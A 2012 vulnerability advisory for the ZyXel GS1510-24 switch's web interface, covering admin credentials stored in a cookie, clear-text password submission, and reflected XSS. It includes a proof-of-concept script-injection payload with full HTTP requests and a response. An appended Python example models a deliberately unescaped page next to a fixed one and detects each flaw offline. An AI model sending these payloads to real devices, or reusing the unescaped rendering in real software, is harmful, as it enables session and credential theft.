ZyXel GS1510 Cross Site Scripting
Posted on 14 March 2012
*Advisory Information*
Title: Multiple vulnerabilities in ZyXel GS1510 web front end
Date published: 2012-03-14 12:57:15 AM
upSploit Ref: UPS-2011-0042

*Advisory Summary*
IT Security Geeks have discovered multiple vulnerabilities in the web management interface of the ZyXel GS1510-24, a 24-port Ethernet switch: the Admin username and password are stored in a cookie, the login form submits the password over clear-text HTTP, and the interface is vulnerable to reflected Cross-Site Scripting (XSS).

*Vendor*
Zyxel

*Affected Software*
V1.00(BVN.1). This is the firmware that runs on the ZyXel model GS1510-24 switch.

*Description of Issue*
The GS1510-24 ZyXel switch, running firmware V1.00(BVN.1), is susceptible to multiple vulnerabilities, all of them within the management web interface:

1. Admin credentials stored in the cookie. The management web interface cookie contains both the username and the password of the Admin user used to log into the switch. Because the cookie carries the password itself rather than a session token, anyone who can read the cookie (on the wire, from browser storage, or through the XSS in issue 3) obtains the Admin password.

2. Clear-text submission of password. The login page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://192.168.1.5/webctrl.cgi
The form contains the following password field: password

3. Cross Site Scripting. The payload
fe07b</title><script>alert(1)</script>b7e71e54af6
was submitted as the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

*PoC*
2. Clear-text submission of password
http://192.168.1.5/webctrl.cgi
The Cookie header of the same request also demonstrates issue 1: the Admin username and password are carried in the cookie in clear text.

Request

GET /login.htm HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cache-Control: max-age=0
SSSSSSS: UUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: admin=password123
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

3. Cross Site Scripting
The payload fe07b</title><script>alert(1)</script>b7e71e54af6 was submitted as the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. The reflection happens in the directory-index page generated by the embedded thttpd server, which places the raw request URI inside the <TITLE> element, so the </title> prefix closes the title and the <script> element that follows is executed. This proof-of-concept demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/?fe07b</title><script>alert(1)</script>b7e71e54af6=1 HTTP/1.1
Host: 192.168.1.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: admin=password123

Response

HTTP/1.1 200 OK
Server: thttpd/2.25b 29dec2003
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 18 Sep 2011 16:30:14 GMT
Last-Modified: Sat, 01 Jan 2000 00:00:03 GMT
Accept-Ranges: bytes
Connection: close

<HTML>
<HEAD><TITLE>Index of /images/?fe07b</title><script>alert(1)</script>b7e71e54af6=1</TITLE></HEAD>
<BODY BGCOLOR="#99cc99" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
<H2>Index of /images/?fe
...[SNIP]...

*Credits*
Neil Fryer/IT Security Geeks

*References*
ZyXel GS1510

*Patch/Fix*
Update to the latest firmware. Until the fix is applied, restrict network access to the switch's web management interface to trusted hosts, since the Admin password travels in clear text in both the login request and the cookie.
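The following Python script is an added example, not part of the advisory and not code from Zyxel or IT Security Geeks. It reproduces the three checks offline: it models the thttpd-style directory index that reflects the raw request URI into the page (with an escaped version beside it), parses a Cookie header for credential-shaped pairs, and scans a login page for forms that post a password field over http://. The login form, the cookie header and the rendered index page are constructed sample inputs modelled on the PoC above; the function names and the list of credential-like cookie names are this example's own assumptions.

```python
"""Offline checks for the three GS1510 web-interface issues (added example)."""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample inputs modelled on the advisory's PoC (not captured traffic).
SAMPLE_COOKIE_HEADER = "admin=password123"
SAMPLE_LOGIN_PAGE = """<html><body>
<form method="post" action="http://192.168.1.5/webctrl.cgi">
  <input type="text" name="username">
  <input type="password" name="password">
</form></body></html>"""
XSS_MARKER = "fe07b</title><script>alert(1)</script>b7e71e54af6"


def render_index_vulnerable(request_uri: str) -> str:
    """Directory index that drops the raw request URI into the markup, as the
    thttpd/2.25b response in the advisory does. Vulnerable by design."""
    return (f"<HTML><HEAD><TITLE>Index of {request_uri}</TITLE></HEAD>\n"
            f"<BODY><H2>Index of {request_uri}</H2></BODY></HTML>")


def render_index_fixed(request_uri: str) -> str:
    """Same page with the URI HTML-escaped before it reaches the markup."""
    safe = html.escape(request_uri, quote=True)
    return (f"<HTML><HEAD><TITLE>Index of {safe}</TITLE></HEAD>\n"
            f"<BODY><H2>Index of {safe}</H2></BODY></HTML>")


def is_reflected_unescaped(body: str, marker: str) -> bool:
    """Issue 3 check: the marker, tags included, comes back byte-for-byte."""
    return marker in body


# Heuristic list (assumption): cookie names that suggest an account or password
# rather than an opaque session token.
CREDENTIAL_COOKIE_NAMES = {"admin", "root", "user", "username",
                           "password", "passwd", "pwd"}


def credential_cookies(cookie_header: str) -> list[tuple[str, str]]:
    """Issue 1 check: return (name, value) pairs whose name is credential-like."""
    found = []
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name.strip().lower() in CREDENTIAL_COOKIE_NAMES:
            found.append((name.strip(), value.strip()))
    return found


class _FormScanner(HTMLParser):
    """Collects, per <form>, its action and whether it has a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def cleartext_password_forms(page_html: str, page_url: str) -> list[str]:
    """Issue 2 check: actions of forms that send a password field over http://.
    A relative action inherits the scheme of the page it was served from."""
    scanner = _FormScanner()
    scanner.feed(page_html)
    hits = []
    for form in scanner.forms:
        if not form["password"]:
            continue
        scheme = urlsplit(form["action"]).scheme or urlsplit(page_url).scheme
        if scheme.lower() == "http":
            hits.append(form["action"])
    return hits


if __name__ == "__main__":
    uri = f"/images/?{XSS_MARKER}=1"
    print("vulnerable index reflects payload:",
          is_reflected_unescaped(render_index_vulnerable(uri), XSS_MARKER))
    print("escaped index reflects payload:   ",
          is_reflected_unescaped(render_index_fixed(uri), XSS_MARKER))
    print("credential cookies:", credential_cookies(SAMPLE_COOKIE_HEADER))
    print("clear-text password forms:",
          cleartext_password_forms(SAMPLE_LOGIN_PAGE, "http://192.168.1.5/login.htm"))
```

Running the script against the constructed samples flags the vulnerable index page, clears the escaped one, reports the admin=password123 pair, and lists http://192.168.1.5/webctrl.cgi as a form that posts a password over clear text. To use the checks against a live device, feed them the response body and headers obtained from an intercepting proxy; the cookie heuristic is name-based and will not spot credentials hidden under an arbitrary cookie name.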
